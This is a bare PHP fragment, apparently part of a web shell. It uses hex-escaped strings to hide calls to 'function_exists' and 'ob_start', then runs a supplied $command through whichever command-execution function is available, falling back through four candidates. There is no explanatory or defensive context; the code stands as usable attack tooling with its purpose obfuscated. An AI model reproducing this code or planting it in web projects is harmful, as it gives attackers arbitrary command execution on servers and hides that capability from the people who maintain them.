<?php
if ("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73"($ex)) {
    $outputArray = [];
    $ex($command);

} elseif ("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73"($pst)) {
    "\x6f\x62\x5f\x73\x74\x61\x72\x74"();
    $pst($command);

} elseif ("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73"($sys)) {
    "\x6f\x62\x5f\x73\x74\x61\x72\x74"();
    $sys($command);

} elseif ("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73"($sex)) {
    $sex($command);

} else {
    echo "Unable to execute command";
    die();
}
?>
